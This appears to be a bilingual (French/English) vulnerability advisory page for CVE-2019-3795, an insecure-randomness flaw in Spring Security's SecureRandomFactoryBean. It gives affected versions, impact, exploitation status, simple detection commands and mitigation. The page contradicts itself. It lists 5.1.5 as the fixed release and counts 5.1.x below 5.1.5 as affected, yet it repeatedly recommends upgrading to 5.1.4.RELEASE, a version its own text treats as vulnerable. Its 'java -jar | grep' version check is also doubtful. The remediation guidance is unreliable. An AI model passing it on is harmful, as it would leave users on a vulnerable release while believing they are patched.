Plateforme
java
Composant
spring-security
Corrigé dans
4.2.12.RELEASE
5.0.12.RELEASE
5.1.5.RELEASE
CVE-2019-3795 describes an insecure randomness vulnerability found in Spring Security. This vulnerability allows an attacker to potentially predict random numbers generated by the application if a seed is provided and the resulting random material is exposed. The vulnerability impacts Spring Security versions 4.2.x prior to 4.2.12, 5.0.x prior to 5.0.12, and 5.1.x prior to 5.1.5. A fix is available in version 5.1.4.RELEASE.
The core of this vulnerability lies in the SecureRandomFactoryBean component of Spring Security. If an application uses this factory and provides a seed value, and subsequently exposes the resulting random data, an attacker can analyze this data to predict future random numbers. This predictability can be exploited to compromise security-sensitive operations that rely on randomness, such as generating session IDs, cryptographic keys, or nonces. While the CVSS score is LOW, the potential impact on applications heavily reliant on secure randomness could be significant, particularly if the seed is predictable or derived from easily obtainable information. The vulnerability doesn't allow direct code execution but weakens the overall security posture by undermining the foundation of cryptographic operations.
CVE-2019-3795 was publicly disclosed on April 9, 2019. There is no indication of active exploitation campaigns targeting this vulnerability at this time. No public proof-of-concept (PoC) exploits have been widely reported. The vulnerability is not currently listed on the CISA KEV catalog. The LOW CVSS score reflects the relatively limited attack surface and the requirement for specific conditions to be met for exploitation.
Applications heavily reliant on Spring Security for authentication and authorization, particularly those that generate cryptographic keys or session IDs using SecureRandomFactoryBean and expose the resulting random data, are at increased risk. Systems using older, unpatched versions of Spring Security (≤5.1.4.RELEASE) are directly vulnerable.
• java / server:
# Check Spring Security version
java -jar your_application.jar | grep 'Spring Security' • java / supply-chain:
# Check for vulnerable dependencies in Maven project
mvn dependency:tree | grep 'spring-security' • generic web:
# Check for potential seed exposure in application logs
grep -i 'seed=' /var/log/your_application/*.logdisclosure
Statut de l'Exploit
EPSS
0.55% (percentile 68%)
Vecteur CVSS
The primary mitigation for CVE-2019-3795 is to upgrade to Spring Security version 5.1.4.RELEASE or later. If an immediate upgrade is not feasible, consider implementing temporary workarounds. Ensure that the seed provided to SecureRandomFactoryBean is truly random and not derived from predictable sources. Avoid exposing the random material generated by SecureRandomFactoryBean to external entities. Review application code to identify any instances where SecureRandomFactoryBean is used and assess the potential impact of the vulnerability. While not a direct fix, strengthening seed generation practices can reduce the likelihood of exploitation.
Mettez à jour la version de Spring Security à la version 4.2.12.RELEASE, 5.0.12.RELEASE ou 5.1.5.RELEASE, ou une version supérieure, selon ce qui convient à votre projet. Cela corrige la vulnérabilité d'aléatoire insecure lors de l'utilisation de SecureRandom.
Analyses de vulnérabilités et alertes critiques directement dans votre boîte mail.
CVE-2019-3795 is a vulnerability in Spring Security affecting versions ≤5.1.4.RELEASE where an attacker can predict random numbers if a seed is provided and the random material is exposed, potentially compromising security-sensitive operations.
You are affected if you are using Spring Security versions 4.2.x prior to 4.2.12, 5.0.x prior to 5.0.12, or 5.1.x prior to 5.1.5.
Upgrade to Spring Security version 5.1.4.RELEASE or later. Ensure seeds are truly random and avoid exposing random material.
There is no indication of active exploitation campaigns targeting this vulnerability at this time.
Refer to the Spring Security security advisory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3795
Téléverse ton fichier de dépendances et découvre instantanément si cette CVE et d'autres te touchent.
Téléverse ton fichier pom.xml et nous te dirons instantanément si tu es affecté.